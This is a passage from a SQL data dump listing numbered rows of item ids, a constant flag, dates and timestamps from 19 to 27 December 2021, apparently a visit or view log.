21:17:16'),(40578,91,1,'2021-12-19','2021-12-19 21:17:51'),(40579,3273,1,'2021-12-19','2021-12-19 21:19:24'),(40580,3273,1,'2021-12-19','2021-12-19 21:19:28'),(40581,91,1,'2021-12-19','2021-12-19 21:19:35'),(40582,4444,1,'2021-12-19','2021-12-19 21:20:42'),(40583,4377,1,'2021-12-19','2021-12-19 21:24:02'),(40584,4363,1,'2021-12-19','2021-12-19 21:24:55'),(40585,4377,1,'2021-12-19','2021-12-19 21:25:17'),(40586,1770,1,'2021-12-19','2021-12-19 21:30:48'),(40587,1594,1,'2021-12-19','2021-12-19 22:03:11'),(40588,470,1,'2021-12-19','2021-12-19 23:05:49'),(40589,1594,1,'2021-12-19','2021-12-19 23:16:56'),(40590,3764,1,'2021-12-20','2021-12-20 00:00:25'),(40591,1544,1,'2021-12-20','2021-12-20 00:27:05'),(40592,4524,1,'2021-12-20','2021-12-20 00:53:00'),(40593,1600,1,'2021-12-20','2021-12-20 01:07:49'),(40594,1612,1,'2021-12-20','2021-12-20 01:15:41'),(40595,1877,1,'2021-12-20','2021-12-20 01:38:01'),(40596,470,1,'2021-12-20','2021-12-20 02:23:43'),(40597,2297,1,'2021-12-20','2021-12-20 04:46:31'),(40598,1588,1,'2021-12-20','2021-12-20 04:47:02'),(40599,1602,1,'2021-12-20','2021-12-20 04:59:24'),(40600,2309,1,'2021-12-20','2021-12-20 05:29:20'),(40601,3664,1,'2021-12-20','2021-12-20 05:38:46'),(40602,470,1,'2021-12-20','2021-12-20 05:54:25'),(40603,3124,1,'2021-12-20','2021-12-20 06:05:03'),(40604,3781,1,'2021-12-20','2021-12-20 06:07:23'),(40605,1594,1,'2021-12-20','2021-12-20 06:08:51'),(40606,472,1,'2021-12-20','2021-12-20 06:16:08'),(40607,477,1,'2021-12-20','2021-12-20 06:38:43'),(40608,2956,1,'2021-12-20','2021-12-20 06:41:47'),(40609,479,1,'2021-12-20','2021-12-20 07:58:19'),(40610,1724,1,'2021-12-20','2021-12-20 08:01:15'),(40611,1600,1,'2021-12-20','2021-12-20 08:01:59'),(40612,1724,1,'2021-12-20','2021-12-20 08:02:50'),(40613,1602,1,'2021-12-20','2021-12-20 09:09:50'),(40614,1604,1,'2021-12-20','2021-12-20 10:20:47'),(40615,1602,1,'2021-12-20','2021-12-20 10:29:43'),(40616,4492,1,'2021-12-20','2021-12-20 11:03:53'),(40617,3710,1,'2021-12-20','2021-12-20 11:04:20'),(40618,2769,1,'2021-12-20','2021-12-20 11:10:48'),(40619,74,1,'2021-12-20','2021-12-20 11:16:58'),(40620,74,1,'2021-12-20','2021-12-20 11:20:24'),(40621,467,1,'2021-12-20','2021-12-20 11:43:18'),(40622,4524,1,'2021-12-20','2021-12-20 11:53:40'),(40623,2991,1,'2021-12-20','2021-12-20 12:13:45'),(40624,1877,1,'2021-12-20','2021-12-20 12:27:41'),(40625,1877,1,'2021-12-20','2021-12-20 12:28:17'),(40626,467,1,'2021-12-20','2021-12-20 12:34:34'),(40627,1582,1,'2021-12-20','2021-12-20 13:08:45'),(40628,3006,1,'2021-12-20','2021-12-20 13:24:32'),(40629,2159,1,'2021-12-20','2021-12-20 13:46:00'),(40630,4492,1,'2021-12-20','2021-12-20 14:04:20'),(40631,2159,1,'2021-12-20','2021-12-20 14:28:41'),(40632,3664,1,'2021-12-20','2021-12-20 14:47:08'),(40633,1614,1,'2021-12-20','2021-12-20 15:00:27'),(40634,1726,1,'2021-12-20','2021-12-20 15:06:55'),(40635,1610,1,'2021-12-20','2021-12-20 15:42:34'),(40636,1602,1,'2021-12-20','2021-12-20 16:02:39'),(40637,3479,1,'2021-12-20','2021-12-20 16:25:54'),(40638,1600,1,'2021-12-20','2021-12-20 16:35:14'),(40639,3092,1,'2021-12-20','2021-12-20 16:44:52'),(40640,3092,1,'2021-12-20','2021-12-20 16:45:28'),(40641,3117,1,'2021-12-20','2021-12-20 16:50:50'),(40642,1612,1,'2021-12-20','2021-12-20 16:54:21'),(40643,2309,1,'2021-12-20','2021-12-20 17:25:57'),(40644,2813,1,'2021-12-20','2021-12-20 17:50:44'),(40645,4238,1,'2021-12-20','2021-12-20 18:13:26'),(40646,3124,1,'2021-12-20','2021-12-20 18:14:53'),(40647,3430,1,'2021-12-20','2021-12-20 18:20:58'),(40648,3479,1,'2021-12-20','2021-12-20 18:24:28'),(40649,3092,1,'2021-12-20','2021-12-20 18:39:24'),(40650,1610,1,'2021-12-20','2021-12-20 19:15:51'),(40651,3710,1,'2021-12-20','2021-12-20 19:24:26'),(40652,2989,1,'2021-12-20','2021-12-20 19:39:25'),(40653,4524,1,'2021-12-20','2021-12-20 20:18:58'),(40654,4524,1,'2021-12-20','2021-12-20 20:19:50'),(40655,3005,1,'2021-12-20','2021-12-20 22:10:08'),(40656,2159,1,'2021-12-20','2021-12-20 23:22:17'),(40657,1594,1,'2021-12-20','2021-12-20 23:52:13'),(40658,1602,1,'2021-12-21','2021-12-21 00:08:55'),(40659,2150,1,'2021-12-21','2021-12-21 00:09:48'),(40660,1600,1,'2021-12-21','2021-12-21 00:59:11'),(40661,4238,1,'2021-12-21','2021-12-21 02:43:59'),(40662,1612,1,'2021-12-21','2021-12-21 02:44:00'),(40663,1697,1,'2021-12-21','2021-12-21 03:24:41'),(40664,2309,1,'2021-12-21','2021-12-21 03:30:47'),(40665,2989,1,'2021-12-21','2021-12-21 03:50:15'),(40666,4492,1,'2021-12-21','2021-12-21 04:01:01'),(40667,4492,1,'2021-12-21','2021-12-21 04:01:41'),(40668,1724,1,'2021-12-21','2021-12-21 04:07:32'),(40669,1724,1,'2021-12-21','2021-12-21 04:07:39'),(40670,4448,1,'2021-12-21','2021-12-21 04:14:01'),(40671,2813,1,'2021-12-21','2021-12-21 04:18:08'),(40672,472,1,'2021-12-21','2021-12-21 04:21:40'),(40673,1728,1,'2021-12-21','2021-12-21 06:03:20'),(40674,1728,1,'2021-12-21','2021-12-21 06:10:26'),(40675,1584,1,'2021-12-21','2021-12-21 06:13:35'),(40676,3710,1,'2021-12-21','2021-12-21 06:22:56'),(40677,4529,1,'2021-12-21','2021-12-21 08:31:32'),(40678,2309,1,'2021-12-21','2021-12-21 08:32:09'),(40679,4524,1,'2021-12-21','2021-12-21 08:32:16'),(40680,4529,1,'2021-12-21','2021-12-21 08:33:46'),(40681,3092,1,'2021-12-21','2021-12-21 09:01:21'),(40682,1697,1,'2021-12-21','2021-12-21 09:47:38'),(40683,1602,1,'2021-12-21','2021-12-21 10:31:17'),(40684,3240,1,'2021-12-21','2021-12-21 10:32:26'),(40685,1544,1,'2021-12-21','2021-12-21 10:48:25'),(40686,1728,1,'2021-12-21','2021-12-21 11:19:17'),(40687,1728,1,'2021-12-21','2021-12-21 11:19:45'),(40688,1728,1,'2021-12-21','2021-12-21 11:20:00'),(40689,1728,1,'2021-12-21','2021-12-21 11:20:17'),(40690,2813,1,'2021-12-21','2021-12-21 12:06:25'),(40691,1606,1,'2021-12-21','2021-12-21 12:14:21'),(40692,1612,1,'2021-12-21','2021-12-21 12:26:28'),(40693,1709,1,'2021-12-21','2021-12-21 12:33:40'),(40694,1709,1,'2021-12-21','2021-12-21 12:33:49'),(40695,1709,1,'2021-12-21','2021-12-21 12:34:03'),(40696,1709,1,'2021-12-21','2021-12-21 12:34:09'),(40697,1709,1,'2021-12-21','2021-12-21 12:34:19'),(40698,1709,1,'2021-12-21','2021-12-21 12:34:51'),(40699,1586,1,'2021-12-21','2021-12-21 12:47:33'),(40700,1586,1,'2021-12-21','2021-12-21 12:47:57'),(40701,1598,1,'2021-12-21','2021-12-21 13:10:03'),(40702,1598,1,'2021-12-21','2021-12-21 13:11:01'),(40703,4524,1,'2021-12-21','2021-12-21 14:09:25'),(40704,1606,1,'2021-12-21','2021-12-21 14:37:15'),(40705,3083,1,'2021-12-21','2021-12-21 15:06:16'),(40706,1588,1,'2021-12-21','2021-12-21 15:10:41'),(40707,4457,1,'2021-12-21','2021-12-21 15:11:11'),(40708,1582,1,'2021-12-21','2021-12-21 17:41:41'),(40709,570,1,'2021-12-21','2021-12-21 17:51:17'),(40710,467,1,'2021-12-21','2021-12-21 17:52:32'),(40711,89,1,'2021-12-21','2021-12-21 18:28:11'),(40712,1594,1,'2021-12-21','2021-12-21 18:52:35'),(40713,470,1,'2021-12-21','2021-12-21 19:03:19'),(40714,1586,1,'2021-12-21','2021-12-21 19:20:59'),(40715,1544,1,'2021-12-21','2021-12-21 19:39:47'),(40716,1606,1,'2021-12-21','2021-12-21 20:24:46'),(40717,2457,1,'2021-12-21','2021-12-21 21:16:26'),(40718,1600,1,'2021-12-21','2021-12-21 21:26:19'),(40719,1586,1,'2021-12-21','2021-12-21 21:37:29'),(40720,570,1,'2021-12-21','2021-12-21 22:17:18'),(40721,3127,1,'2021-12-22','2021-12-22 01:40:08'),(40722,76,1,'2021-12-22','2021-12-22 02:56:57'),(40723,4457,1,'2021-12-22','2021-12-22 03:42:43'),(40724,1724,1,'2021-12-22','2021-12-22 04:55:52'),(40725,1724,1,'2021-12-22','2021-12-22 04:57:21'),(40726,1606,1,'2021-12-22','2021-12-22 05:38:09'),(40727,1747,1,'2021-12-22','2021-12-22 05:39:11'),(40728,1747,1,'2021-12-22','2021-12-22 05:39:55'),(40729,4326,1,'2021-12-22','2021-12-22 06:22:52'),(40730,1602,1,'2021-12-22','2021-12-22 06:26:30'),(40731,1602,1,'2021-12-22','2021-12-22 07:07:49'),(40732,470,1,'2021-12-22','2021-12-22 07:32:10'),(40733,4238,1,'2021-12-22','2021-12-22 07:34:25'),(40734,473,1,'2021-12-22','2021-12-22 07:34:32'),(40735,487,1,'2021-12-22','2021-12-22 07:34:35'),(40736,2813,1,'2021-12-22','2021-12-22 07:52:48'),(40737,1870,1,'2021-12-22','2021-12-22 08:20:37'),(40738,4238,1,'2021-12-22','2021-12-22 09:04:31'),(40739,1594,1,'2021-12-22','2021-12-22 09:07:44'),(40740,1592,1,'2021-12-22','2021-12-22 09:24:09'),(40741,1724,1,'2021-12-22','2021-12-22 09:34:55'),(40742,4391,1,'2021-12-22','2021-12-22 09:51:26'),(40743,469,1,'2021-12-22','2021-12-22 10:11:43'),(40744,1612,1,'2021-12-22','2021-12-22 10:14:07'),(40745,2159,1,'2021-12-22','2021-12-22 10:17:06'),(40746,2159,1,'2021-12-22','2021-12-22 10:17:18'),(40747,2159,1,'2021-12-22','2021-12-22 10:17:29'),(40748,1608,1,'2021-12-22','2021-12-22 11:43:58'),(40749,68,1,'2021-12-22','2021-12-22 11:44:42'),(40750,1608,1,'2021-12-22','2021-12-22 11:46:32'),(40751,1608,1,'2021-12-22','2021-12-22 12:33:10'),(40752,3083,1,'2021-12-22','2021-12-22 13:32:44'),(40753,2503,1,'2021-12-22','2021-12-22 14:10:56'),(40754,1544,1,'2021-12-22','2021-12-22 14:34:24'),(40755,1606,1,'2021-12-22','2021-12-22 15:18:08'),(40756,1608,1,'2021-12-22','2021-12-22 15:34:03'),(40757,3531,1,'2021-12-22','2021-12-22 15:34:40'),(40758,1610,1,'2021-12-22','2021-12-22 15:56:42'),(40759,2813,1,'2021-12-22','2021-12-22 16:19:21'),(40760,3531,1,'2021-12-22','2021-12-22 16:23:45'),(40761,2063,1,'2021-12-22','2021-12-22 16:39:42'),(40762,1695,1,'2021-12-22','2021-12-22 16:52:21'),(40763,2148,1,'2021-12-22','2021-12-22 17:23:23'),(40764,3092,1,'2021-12-22','2021-12-22 17:35:05'),(40765,3531,1,'2021-12-22','2021-12-22 17:49:46'),(40766,2309,1,'2021-12-22','2021-12-22 17:52:49'),(40767,2309,1,'2021-12-22','2021-12-22 17:53:33'),(40768,80,1,'2021-12-22','2021-12-22 17:57:45'),(40769,2410,1,'2021-12-22','2021-12-22 18:06:56'),(40770,89,1,'2021-12-22','2021-12-22 18:16:15'),(40771,4238,1,'2021-12-22','2021-12-22 18:16:32'),(40772,3710,1,'2021-12-22','2021-12-22 18:25:02'),(40773,472,1,'2021-12-22','2021-12-22 18:33:36'),(40774,1582,1,'2021-12-22','2021-12-22 19:17:15'),(40775,84,1,'2021-12-22','2021-12-22 19:18:49'),(40776,3664,1,'2021-12-22','2021-12-22 19:20:04'),(40777,84,1,'2021-12-22','2021-12-22 19:21:14'),(40778,1877,1,'2021-12-22','2021-12-22 19:21:17'),(40779,84,1,'2021-12-22','2021-12-22 19:21:39'),(40780,3267,1,'2021-12-22','2021-12-22 19:24:27'),(40781,3030,1,'2021-12-22','2021-12-22 19:54:13'),(40782,1877,1,'2021-12-22','2021-12-22 20:17:19'),(40783,3253,1,'2021-12-22','2021-12-22 20:21:50'),(40784,80,1,'2021-12-22','2021-12-22 20:22:17'),(40785,3253,1,'2021-12-22','2021-12-22 20:31:32'),(40786,3253,1,'2021-12-22','2021-12-22 20:31:49'),(40787,3253,1,'2021-12-22','2021-12-22 20:32:09'),(40788,3781,1,'2021-12-22','2021-12-22 20:46:04'),(40789,3030,1,'2021-12-22','2021-12-22 21:01:38'),(40790,80,1,'2021-12-22','2021-12-22 21:16:17'),(40791,1614,1,'2021-12-22','2021-12-22 21:30:37'),(40792,1877,1,'2021-12-22','2021-12-22 21:45:37'),(40793,1598,1,'2021-12-22','2021-12-22 22:15:55'),(40794,472,1,'2021-12-22','2021-12-22 22:31:37'),(40795,1594,1,'2021-12-22','2021-12-22 22:47:10'),(40796,3781,1,'2021-12-22','2021-12-22 23:30:34'),(40797,1592,1,'2021-12-22','2021-12-22 23:47:08'),(40798,2457,1,'2021-12-23','2021-12-23 00:00:36'),(40799,80,1,'2021-12-23','2021-12-23 00:14:43'),(40800,1592,1,'2021-12-23','2021-12-23 00:15:38'),(40801,68,1,'2021-12-23','2021-12-23 00:30:42'),(40802,1612,1,'2021-12-23','2021-12-23 00:45:54'),(40803,2410,1,'2021-12-23','2021-12-23 01:00:36'),(40804,2804,1,'2021-12-23','2021-12-23 01:15:35'),(40805,2503,1,'2021-12-23','2021-12-23 01:43:53'),(40806,3092,1,'2021-12-23','2021-12-23 02:11:26'),(40807,3764,1,'2021-12-23','2021-12-23 02:30:44'),(40808,3724,1,'2021-12-23','2021-12-23 02:45:50'),(40809,1614,1,'2021-12-23','2021-12-23 03:04:39'),(40810,2419,1,'2021-12-23','2021-12-23 03:19:15'),(40811,2813,1,'2021-12-23','2021-12-23 03:46:11'),(40812,1774,1,'2021-12-23','2021-12-23 03:53:31'),(40813,89,1,'2021-12-23','2021-12-23 04:15:37'),(40814,1584,1,'2021-12-23','2021-12-23 04:23:33'),(40815,3724,1,'2021-12-23','2021-12-23 04:30:35'),(40816,1586,1,'2021-12-23','2021-12-23 05:00:45'),(40817,1602,1,'2021-12-23','2021-12-23 05:20:14'),(40818,3674,1,'2021-12-23','2021-12-23 05:30:37'),(40819,1590,1,'2021-12-23','2021-12-23 05:46:20'),(40820,1598,1,'2021-12-23','2021-12-23 06:23:08'),(40821,1590,1,'2021-12-23','2021-12-23 06:30:36'),(40822,80,1,'2021-12-23','2021-12-23 07:15:35'),(40823,1724,1,'2021-12-23','2021-12-23 07:22:16'),(40824,1600,1,'2021-12-23','2021-12-23 07:22:16'),(40825,3781,1,'2021-12-23','2021-12-23 07:45:35'),(40826,2457,1,'2021-12-23','2021-12-23 08:00:36'),(40827,68,1,'2021-12-23','2021-12-23 08:15:37'),(40828,2410,1,'2021-12-23','2021-12-23 08:31:10'),(40829,2410,1,'2021-12-23','2021-12-23 08:32:30'),(40830,1592,1,'2021-12-23','2021-12-23 08:46:02'),(40831,1606,1,'2021-12-23','2021-12-23 08:58:48'),(40832,1594,1,'2021-12-23','2021-12-23 09:01:24'),(40833,4238,1,'2021-12-23','2021-12-23 09:03:36'),(40834,2775,1,'2021-12-23','2021-12-23 09:21:02'),(40835,3117,1,'2021-12-23','2021-12-23 10:51:49'),(40836,3240,1,'2021-12-23','2021-12-23 11:36:42'),(40837,1612,1,'2021-12-23','2021-12-23 11:45:48'),(40838,3038,1,'2021-12-23','2021-12-23 11:54:14'),(40839,1598,1,'2021-12-23','2021-12-23 14:53:18'),(40840,1594,1,'2021-12-23','2021-12-23 15:47:50'),(40841,2410,1,'2021-12-23','2021-12-23 16:06:51'),(40842,1718,1,'2021-12-23','2021-12-23 16:09:19'),(40843,1718,1,'2021-12-23','2021-12-23 16:09:33'),(40844,1718,1,'2021-12-23','2021-12-23 16:09:59'),(40845,1718,1,'2021-12-23','2021-12-23 16:10:09'),(40846,1724,1,'2021-12-23','2021-12-23 16:10:34'),(40847,2297,1,'2021-12-23','2021-12-23 16:38:59'),(40848,91,1,'2021-12-23','2021-12-23 16:39:13'),(40849,2297,1,'2021-12-23','2021-12-23 16:55:49'),(40850,91,1,'2021-12-23','2021-12-23 16:56:03'),(40851,2297,1,'2021-12-23','2021-12-23 16:56:08'),(40852,80,1,'2021-12-23','2021-12-23 16:56:17'),(40853,2419,1,'2021-12-23','2021-12-23 16:57:04'),(40854,1610,1,'2021-12-23','2021-12-23 18:36:13'),(40855,1602,1,'2021-12-23','2021-12-23 18:49:35'),(40856,4492,1,'2021-12-23','2021-12-23 20:43:40'),(40857,4348,1,'2021-12-23','2021-12-23 20:43:49'),(40858,4508,1,'2021-12-23','2021-12-23 20:43:53'),(40859,4485,1,'2021-12-23','2021-12-23 20:44:11'),(40860,4498,1,'2021-12-23','2021-12-23 20:44:18'),(40861,4510,1,'2021-12-23','2021-12-23 20:44:19'),(40862,72,1,'2021-12-23','2021-12-23 20:44:25'),(40863,4496,1,'2021-12-23','2021-12-23 20:44:51'),(40864,4344,1,'2021-12-23','2021-12-23 20:44:57'),(40865,1602,1,'2021-12-23','2021-12-23 20:51:43'),(40866,1602,1,'2021-12-23','2021-12-23 21:00:43'),(40867,3781,1,'2021-12-23','2021-12-23 22:15:15'),(40868,3531,1,'2021-12-23','2021-12-23 22:51:04'),(40869,1606,1,'2021-12-23','2021-12-23 22:51:05'),(40870,1612,1,'2021-12-23','2021-12-23 23:00:07'),(40871,3265,1,'2021-12-23','2021-12-23 23:09:52'),(40872,4341,1,'2021-12-23','2021-12-23 23:13:49'),(40873,2775,1,'2021-12-23','2021-12-23 23:18:17'),(40874,1701,1,'2021-12-23','2021-12-23 23:27:21'),(40875,108,1,'2021-12-23','2021-12-23 23:36:04'),(40876,2813,1,'2021-12-23','2021-12-23 23:37:03'),(40877,2813,1,'2021-12-23','2021-12-23 23:38:08'),(40878,1600,1,'2021-12-24','2021-12-24 00:27:28'),(40879,3781,1,'2021-12-24','2021-12-24 00:27:52'),(40880,4514,1,'2021-12-24','2021-12-24 00:39:36'),(40881,2775,1,'2021-12-24','2021-12-24 01:04:01'),(40882,2775,1,'2021-12-24','2021-12-24 01:04:06'),(40883,1699,1,'2021-12-24','2021-12-24 01:07:17'),(40884,74,1,'2021-12-24','2021-12-24 01:19:33'),(40885,2813,1,'2021-12-24','2021-12-24 01:30:26'),(40886,1598,1,'2021-12-24','2021-12-24 01:37:30'),(40887,2309,1,'2021-12-24','2021-12-24 01:42:29'),(40888,2309,1,'2021-12-24','2021-12-24 01:45:09'),(40889,1544,1,'2021-12-24','2021-12-24 01:52:38'),(40890,1544,1,'2021-12-24','2021-12-24 01:52:51'),(40891,1602,1,'2021-12-24','2021-12-24 01:54:36'),(40892,4424,1,'2021-12-24','2021-12-24 03:50:07'),(40893,3531,1,'2021-12-24','2021-12-24 03:50:34'),(40894,1707,1,'2021-12-24','2021-12-24 04:35:19'),(40895,482,1,'2021-12-24','2021-12-24 05:20:21'),(40896,3752,1,'2021-12-24','2021-12-24 06:05:34'),(40897,4514,1,'2021-12-24','2021-12-24 06:39:19'),(40898,1749,1,'2021-12-24','2021-12-24 07:07:36'),(40899,1612,1,'2021-12-24','2021-12-24 07:51:13'),(40900,1612,1,'2021-12-24','2021-12-24 07:54:50'),(40901,3781,1,'2021-12-24','2021-12-24 07:58:48'),(40902,482,1,'2021-12-24','2021-12-24 08:20:16'),(40903,1592,1,'2021-12-24','2021-12-24 08:20:54'),(40904,1598,1,'2021-12-24','2021-12-24 08:55:08'),(40905,3742,1,'2021-12-24','2021-12-24 08:59:26'),(40906,108,1,'2021-12-24','2021-12-24 09:02:23'),(40907,4391,1,'2021-12-24','2021-12-24 09:18:48'),(40908,1598,1,'2021-12-24','2021-12-24 09:24:17'),(40909,2297,1,'2021-12-24','2021-12-24 09:32:30'),(40910,472,1,'2021-12-24','2021-12-24 09:41:20'),(40911,3072,1,'2021-12-24','2021-12-24 09:51:35'),(40912,2309,1,'2021-12-24','2021-12-24 09:55:03'),(40913,4238,1,'2021-12-24','2021-12-24 10:03:02'),(40914,2813,1,'2021-12-24','2021-12-24 10:09:54'),(40915,2309,1,'2021-12-24','2021-12-24 10:24:29'),(40916,1544,1,'2021-12-24','2021-12-24 10:35:46'),(40917,89,1,'2021-12-24','2021-12-24 10:40:20'),(40918,1594,1,'2021-12-24','2021-12-24 10:54:35'),(40919,1602,1,'2021-12-24','2021-12-24 11:09:06'),(40920,1870,1,'2021-12-24','2021-12-24 11:32:50'),(40921,2457,1,'2021-12-24','2021-12-24 11:38:00'),(40922,72,1,'2021-12-24','2021-12-24 11:39:45'),(40923,91,1,'2021-12-24','2021-12-24 11:52:46'),(40924,2457,1,'2021-12-24','2021-12-24 11:53:14'),(40925,80,1,'2021-12-24','2021-12-24 11:53:19'),(40926,2457,1,'2021-12-24','2021-12-24 11:53:53'),(40927,1594,1,'2021-12-24','2021-12-24 11:54:05'),(40928,4326,1,'2021-12-24','2021-12-24 12:01:25'),(40929,2457,1,'2021-12-24','2021-12-24 12:09:27'),(40930,4238,1,'2021-12-24','2021-12-24 12:18:23'),(40931,1614,1,'2021-12-24','2021-12-24 12:24:06'),(40932,3764,1,'2021-12-24','2021-12-24 12:39:20'),(40933,1732,1,'2021-12-24','2021-12-24 12:48:27'),(40934,3004,1,'2021-12-24','2021-12-24 12:54:53'),(40935,2813,1,'2021-12-24','2021-12-24 13:24:05'),(40936,1606,1,'2021-12-24','2021-12-24 13:31:10'),(40937,1610,1,'2021-12-24','2021-12-24 13:39:05'),(40938,4448,1,'2021-12-24','2021-12-24 13:47:52'),(40939,2419,1,'2021-12-24','2021-12-24 13:54:09'),(40940,3694,1,'2021-12-24','2021-12-24 14:24:07'),(40941,3127,1,'2021-12-24','2021-12-24 14:39:08'),(40942,1602,1,'2021-12-24','2021-12-24 14:40:33'),(40943,3004,1,'2021-12-24','2021-12-24 14:54:06'),(40944,1606,1,'2021-12-24','2021-12-24 15:01:12'),(40945,3694,1,'2021-12-24','2021-12-24 15:09:07'),(40946,2252,1,'2021-12-24','2021-12-24 15:22:54'),(40947,2704,1,'2021-12-24','2021-12-24 15:51:42'),(40948,4416,1,'2021-12-24','2021-12-24 16:08:39'),(40949,1768,1,'2021-12-24','2021-12-24 16:13:38'),(40950,3752,1,'2021-12-24','2021-12-24 16:38:15'),(40951,1598,1,'2021-12-24','2021-12-24 17:38:38'),(40952,108,1,'2021-12-24','2021-12-24 17:38:40'),(40953,3072,1,'2021-12-24','2021-12-24 18:23:12'),(40954,4332,1,'2021-12-24','2021-12-24 18:23:17'),(40955,2457,1,'2021-12-24','2021-12-24 18:53:12'),(40956,1544,1,'2021-12-24','2021-12-24 19:31:21'),(40957,68,1,'2021-12-24','2021-12-24 20:08:31'),(40958,2309,1,'2021-12-24','2021-12-24 20:21:36'),(40959,2309,1,'2021-12-24','2021-12-24 20:22:25'),(40960,3764,1,'2021-12-24','2021-12-24 20:33:54'),(40961,4238,1,'2021-12-24','2021-12-24 20:58:26'),(40962,3004,1,'2021-12-24','2021-12-24 20:59:39'),(40963,1732,1,'2021-12-24','2021-12-24 21:01:40'),(40964,472,1,'2021-12-24','2021-12-24 21:21:26'),(40965,1598,1,'2021-12-24','2021-12-24 22:04:18'),(40966,2419,1,'2021-12-24','2021-12-24 22:32:30'),(40967,1612,1,'2021-12-24','2021-12-24 22:42:32'),(40968,480,1,'2021-12-24','2021-12-24 23:03:34'),(40969,4332,1,'2021-12-24','2021-12-24 23:14:52'),(40970,1610,1,'2021-12-24','2021-12-24 23:44:57'),(40971,474,1,'2021-12-24','2021-12-24 23:58:44'),(40972,3267,1,'2021-12-25','2021-12-25 00:44:59'),(40973,1707,1,'2021-12-25','2021-12-25 01:30:01'),(40974,4508,1,'2021-12-25','2021-12-25 01:32:29'),(40975,3531,1,'2021-12-25','2021-12-25 02:15:04'),(40976,1594,1,'2021-12-25','2021-12-25 03:27:00'),(40977,1606,1,'2021-12-25','2021-12-25 04:19:04'),(40978,2457,1,'2021-12-25','2021-12-25 04:19:05'),(40979,68,1,'2021-12-25','2021-12-25 05:04:04'),(40980,1544,1,'2021-12-25','2021-12-25 05:49:29'),(40981,472,1,'2021-12-25','2021-12-25 05:53:51'),(40982,1606,1,'2021-12-25','2021-12-25 06:34:19'),(40983,4238,1,'2021-12-25','2021-12-25 06:35:24'),(40984,108,1,'2021-12-25','2021-12-25 07:19:09'),(40985,1594,1,'2021-12-25','2021-12-25 07:58:07'),(40986,3764,1,'2021-12-25','2021-12-25 08:20:07'),(40987,4457,1,'2021-12-25','2021-12-25 08:24:52'),(40988,1612,1,'2021-12-25','2021-12-25 08:42:39'),(40989,3090,1,'2021-12-25','2021-12-25 09:12:39'),(40990,2804,1,'2021-12-25','2021-12-25 10:42:36'),(40991,76,1,'2021-12-25','2021-12-25 12:03:13'),(40992,3267,1,'2021-12-25','2021-12-25 12:42:05'),(40993,68,1,'2021-12-25','2021-12-25 12:57:37'),(40994,3752,1,'2021-12-25','2021-12-25 13:27:02'),(40995,3269,1,'2021-12-25','2021-12-25 13:39:28'),(40996,2457,1,'2021-12-25','2021-12-25 13:39:41'),(40997,1749,1,'2021-12-25','2021-12-25 13:40:46'),(40998,1586,1,'2021-12-25','2021-12-25 13:56:41'),(40999,3731,1,'2021-12-25','2021-12-25 13:57:44'),(41000,1594,1,'2021-12-25','2021-12-25 14:15:52'),(41001,91,1,'2021-12-25','2021-12-25 14:27:55'),(41002,1544,1,'2021-12-25','2021-12-25 14:33:34'),(41003,1544,1,'2021-12-25','2021-12-25 15:17:41'),(41004,3727,1,'2021-12-25','2021-12-25 15:52:05'),(41005,3731,1,'2021-12-25','2021-12-25 15:58:07'),(41006,4326,1,'2021-12-25','2021-12-25 16:02:40'),(41007,3742,1,'2021-12-25','2021-12-25 16:29:41'),(41008,2989,1,'2021-12-25','2021-12-25 16:29:47'),(41009,1582,1,'2021-12-25','2021-12-25 16:48:49'),(41010,3069,1,'2021-12-25','2021-12-25 17:00:42'),(41011,3764,1,'2021-12-25','2021-12-25 17:53:30'),(41012,2457,1,'2021-12-25','2021-12-25 18:18:01'),(41013,3069,1,'2021-12-25','2021-12-25 18:35:33'),(41014,2148,1,'2021-12-25','2021-12-25 19:27:56'),(41015,1720,1,'2021-12-25','2021-12-25 20:03:55'),(41016,470,1,'2021-12-25','2021-12-25 20:44:25'),(41017,473,1,'2021-12-25','2021-12-25 22:18:54'),(41018,4485,1,'2021-12-25','2021-12-25 23:02:18'),(41019,3531,1,'2021-12-25','2021-12-25 23:34:14'),(41020,4510,1,'2021-12-25','2021-12-25 23:50:12'),(41021,3267,1,'2021-12-26','2021-12-26 00:20:18'),(41022,3265,1,'2021-12-26','2021-12-26 01:04:13'),(41023,2457,1,'2021-12-26','2021-12-26 02:19:57'),(41024,2309,1,'2021-12-26','2021-12-26 04:09:30'),(41025,3742,1,'2021-12-26','2021-12-26 04:25:12'),(41026,3738,1,'2021-12-26','2021-12-26 04:31:37'),(41027,72,1,'2021-12-26','2021-12-26 04:40:50'),(41028,3735,1,'2021-12-26','2021-12-26 05:10:02'),(41029,1584,1,'2021-12-26','2021-12-26 06:54:55'),(41030,3752,1,'2021-12-26','2021-12-26 07:41:53'),(41031,1602,1,'2021-12-26','2021-12-26 07:45:18'),(41032,3735,1,'2021-12-26','2021-12-26 08:03:21'),(41033,3287,1,'2021-12-26','2021-12-26 08:13:10'),(41034,3531,1,'2021-12-26','2021-12-26 08:26:17'),(41035,4424,1,'2021-12-26','2021-12-26 08:28:19'),(41036,4424,1,'2021-12-26','2021-12-26 08:29:03'),(41037,3430,1,'2021-12-26','2021-12-26 08:41:32'),(41038,3430,1,'2021-12-26','2021-12-26 08:52:32'),(41039,68,1,'2021-12-26','2021-12-26 09:22:10'),(41040,1602,1,'2021-12-26','2021-12-26 09:25:33'),(41041,4448,1,'2021-12-26','2021-12-26 09:28:35'),(41042,91,1,'2021-12-26','2021-12-26 09:36:36'),(41043,1718,1,'2021-12-26','2021-12-26 11:11:46'),(41044,4520,1,'2021-12-26','2021-12-26 13:26:24'),(41045,1596,1,'2021-12-26','2021-12-26 14:37:37'),(41046,4514,1,'2021-12-26','2021-12-26 15:19:25'),(41047,1596,1,'2021-12-26','2021-12-26 16:04:29'),(41048,3006,1,'2021-12-26','2021-12-26 16:39:00'),(41049,3675,1,'2021-12-26','2021-12-26 17:43:18'),(41050,1768,1,'2021-12-26','2021-12-26 18:09:01'),(41051,3675,1,'2021-12-26','2021-12-26 18:10:51'),(41052,1602,1,'2021-12-26','2021-12-26 18:25:08'),(41053,89,1,'2021-12-26','2021-12-26 18:38:05'),(41054,2658,1,'2021-12-26','2021-12-26 19:19:57'),(41055,2658,1,'2021-12-26','2021-12-26 21:09:49'),(41056,1582,1,'2021-12-26','2021-12-26 22:32:21'),(41057,89,1,'2021-12-27','2021-12-27 00:32:06'),(41058,1582,1,'2021-12-27','2021-12-27 00:34:19'),(41059,3752,1,'2021-12-27','2021-12-27 01:23:57'),(41060,1602,1,'2021-12-27','2021-12-27 02:29:44'),(41061,1600,1,'2021-12-27','2021-12-27 02:32:45'),(41062,1594,1,'2021-12-27','2021-12-27 03:38:36'),(41063,72,1,'2021-12-27','2021-12-27 